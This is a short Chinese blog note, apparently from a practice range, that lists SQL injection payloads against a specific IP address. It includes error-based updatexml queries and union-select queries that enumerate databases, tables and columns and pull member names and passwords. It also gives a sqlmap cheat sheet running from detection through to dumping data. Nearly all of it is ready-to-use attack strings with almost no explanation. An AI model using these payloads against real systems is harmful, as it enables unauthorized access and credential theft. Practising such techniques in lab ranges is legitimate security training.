zoukankan      html  css  js  c++  java
  • sqlmap

    http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select database()),0x7e),1)--+
    http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'),0x7e),1)--+
    http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='stormgroup' and table_name = 'member'),0x7e),1)--+









    http://219.153.49.228:48166/new_list.php?id=1 and length (database())=10

    http://219.153.49.228:47592/new_list.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='mozhe_Discuz_StormGroup' ),3,4
    http://219.153.49.228:47592/new_list.php?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema ='mozhe_Discuz_StormGroup' and table_name = 'StormGroup_member' ),3,4
    http://219.153.49.228:47592/new_list.php?id=-1 union select 1,(select group_concat(name,password) from mozhe_Discuz_StormGroup.StormGroup_member ),3,4





    测试注入:python sqlmap.py -u "url"
    注数据库:python sqlmap.py -u "url" --dbs
    注当前数据库:python sqlmap.py -u "url" --current-db
    注当前数据库用户名:python sqlmap.py -u "url" --current-user
    注表名:python sqlmap.py -u "url" -D 库名 --tables
    注列名:python sqlmap.py -u "url" -D 库名 -T 表名 --columns
    注数据:python sqlmap.py -u "url" -D 库名 -T 表名 -C 列名,列名 --dump
    查询表条数:python sqlmap.py -u "url" --count -D 当前数据库名
        




    extarctvalue  floor(ran)

    勿做伸手党,勤思考,总能成就一番事业。
  • 相关阅读:
    ORACLE 数据迁移到SQL SEVER2005的问题
    sql server性能分析检测数据库阻塞语句
    经典存储过程
    sql server性能分析查询死锁的sql语句
    sql server性能分析索引使用效率评估
    discuz!X2.5不改代码即可去掉网址后面的forum.php后缀
    discuz!X2.5伪静态设置
    详解ListView
    frameset、frame和iframe的区别
    android中的Context到底该怎么用
  • 原文地址:https://www.cnblogs.com/X-caiji/p/11188458.html
Copyright © 2011-2022 走看看